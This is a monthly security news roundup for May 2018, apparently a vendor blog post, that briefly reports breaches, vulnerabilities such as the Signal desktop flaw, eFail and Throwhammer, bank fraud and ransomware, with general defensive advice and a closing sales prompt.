The Month in Hacks: May 2018

Signal vulnerability discovered, Romanian hackers are extradited to the US, and fraudulent Chrome extensions wreak havoc. It's all this and more in The Month in Hacks.

Severe Vulnerability Discovered in Signal Messaging App

Researchers have found a severe vulnerability in Signal, a popular messaging app, which allows hackers to execute malicious code on Windows or Linux systems. Attackers simply need to send a message containing a malicious Javascript payload through a message and the system executes the code without any interaction from the user.

After being informed of the vulnerability, Signal quickly released a patch fixing the flaw. While there is no evidence of the attack being used in the wild, it is recommended that Signal users update their desktop app as soon as possible.

Chili's Restaurant Chain Suffers Data Breach

The Chili's restaurant chain has been involved in a data breach which may have exposed customer credit card information. In a statement, the company said that the data breach was first discovered on 11 May and "may have resulted in unauthorized access or acquisition of [customer] payment card data."It is not known how many customers have been involved. According to Chili's, malware was used to scrape credit and debit card numbers alongside cardholder names from point-of-sale (PoS) systems used for in-restaurant purchases.

eFail Attack Allows Hackers to Decrypt Encrypted Emails

Vulnerabilities dubbed "eFail" by a team of European security researchers could allow potential attackers to decrypt the content of encrypted emails to plain text if HTML emails are not handled properly by email clients.

eFail attacks can happen when a user's encrypted email is modified by a hacker and sent back to the user. If the user's email client is rendering HTML tags, it will decrypt the message and send it back to the attacker.

A solution is to switch to an email client that doesn't render HTML emails by default (thus preventing external resources from automatically loading) and always shows a warning when the integrity of the emails is compromised.

Thieves Steal Millions From Mexican Banks

Thieves reportedly siphoned hundreds of millions of pesos out of Mexican banks, including No. 2 Banorte, by creating phantom orders that wired funds to bogus accounts and promptly withdrew the money, two sources close to the government's investigation said. Hackers sent hundreds of false orders to move amounts ranging from tens of thousands to hundreds of thousands of pesos from banks including Banorte, to fake accounts in other banks, the sources said, and accomplices then emptied the accounts in cash withdrawals in dozens of branch offices. One source said the thieves transferred more than 300 million pesos ($15.4 million).

T-Mobile Employee Portal Bug Exposes Customer Data

A T-Mobile web domain left millions of customers' account information — including their names, addresses, and sometimes tax identification numbers — unprotected for anyone to access, according to The Verge. The website is designed as a customer care portal for employees, but it was available to find through search engines and required no password to access the tools. The website flaw had to do with an unprotected API, which T-Mobile pulled offline a day after this bug was reported through its bug bounty program.

Throwhammer Attack Remotely Hijacks Computers Over the LAN

The new Rowhammer attack dubbed "Throwhammer" could allow attackers to remotely hack systems over the local area network. By sending malicious packets to vulnerable network cards and repeatedly accessing a row of memory, "bit flipping" can occur, changing the contents of computer memory.

A very high-speed network is essential to a successful Throwhammer attack, since hundreds of thousands of requests to specific DRAM locations within milliseconds are required to trigger a bit flip.

Solutions are being presented by researchers to mitigate the Throwhammer attack, but there is currently no patch or fix available.

Hackers Extradited Over $18 Million Vishing and Smishing Scam

Two Romanian hackers allegedly robbed Americans of more than $18 million through an elaborate phishing scheme, according to The Hacker News. The international computer hackers have been extradited to the U.S. to face 31 criminal charges.

According to the indictment, automated texts and phone calls were initiated by installing interactive voice response software. The Department of Justice described the voice- and SMS-phishing tactics as "vishing" and "smishing". The hackers were able to collect victims' bank account numbers, PINs, and social security numbers before being caught.

First Ransomware To Use ‘Process Doppelgänging' Technique

A new variant of SynAck ransomware becomes the first-ever ransomware exploiting a fileless code injection technique called ‘Process Doppelgänging' to evade detection. It is targeting users in the United States, Germany, Iran, and Kuwait.

The anti-analysis and anti-detection technique uses NTFS transactions to trick antivirus and process monitoring tools into believing that a legitimate process is running when a malicious process has actually been launched.

Most ransomware spreads through malicious internet advertisements, third-party apps, and phishing emails. Always be vigilant when clicking on links or opening uninvited documents, and maintain a file backup routine to an external storage device.

Talk To An Expert

Interested in learning about how TeleSign's identity and engagement solutions can prevent fraud while fostering secure and global growth for your business? Let's chat.